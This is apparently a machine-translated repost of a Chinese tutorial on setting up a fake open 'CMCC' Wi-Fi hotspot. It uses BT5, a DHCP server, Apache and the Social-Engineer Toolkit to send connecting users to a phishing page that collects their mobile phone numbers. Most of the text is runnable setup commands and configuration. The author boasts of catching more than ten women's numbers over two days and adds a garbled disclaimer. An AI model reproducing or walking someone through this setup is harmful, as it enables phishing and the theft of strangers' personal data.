Simply build a fishing Wifi signal to get the user's mobile phone number

. If there is no CMCC signal nearby, we can build a free CMCC fishing Wifi signal, let others take the initiative to enter the mobile phone number authentication to get the user's mobile phone number, which is not better, the following is the implementation plan. Preparation: Wireless network card (8137), bt5, phishing page 1: Insert the wireless network card into BT5, start the network card, and give eth0 an ip#ifconfig eth0 up #ifconfig wlan0 up #ifconfig eht0 192.168.10.2/24 2: Install dhcp and configure #apt-get install dhcp3-server# vi /etc/default/dhcp3-serverINTERFACES="eth0" Modify to INTERFACES="at0"# vi /etc/dhcp3/dhcpd.conf to paste the following, Or change to the network segment you want to divide. Default-lease-time 600;max-lease-time 7200;option subnet-mask 255.255.255.0;option broadcast-address 192.168.10.255;option routers 192.168.10.2;option domain-name-servers 192.168.10.1;option domain-name "www.metasploit.cn";subnet 192.168.10.0 netmask 255.255.255.0 {range 192.168.10.10 192.168.10.100;} Figure 3: Start apache and configure phishing page # /etc/init.d/apache2 start# cd /Var/www/??? //Enter the website directory, the default home page of apache in bt5 is index.html#vi index.html??? //Modify into your own phishing page, here for the demonstration, I insert the basic fishing BT5 inside me There is an XSS platform installed, here Ip should pay attention to, and the ip segment that we just allocated in the dhcp configuration file is the same network segment, otherwise others can connect in, can not access; of course, if you directly fake the mobile CMCC page! Four: Prepare almost, the artifact should be sent out # cd /pentest/exploits/set/# ./set select the first set>11)? Social-Engineering Attacks Next step here select the first set>8 WirelessAccess Point Attack Vector Next set:wireless>1 //Select 1 Start will prompt you to edit the dhcp3-server file. Press Ctrl+x to exit directly, because we edited it before. Next select the assigned Ip segment set:wireless>2Enter the wireless network interface (ex. wlan0):wlan0 //select wlan0 (forget one, # vi /pentest/exploits/set/config/set_config.py change to your own The name of the AP, I changed it to CMCC) The following is the effect of connecting the AP without entering a password to open any website will jump to my phishing page UC landing effect summary: fishing for 2 days, catch more than 10 "beauty" Mobile phone number, the effect is still good, if the fake cmcc landing page, the effect will be better! (Technical research only, don't use it for legal purposes! The consequences are at your own risk) This article is from [System Home] www.xp85.com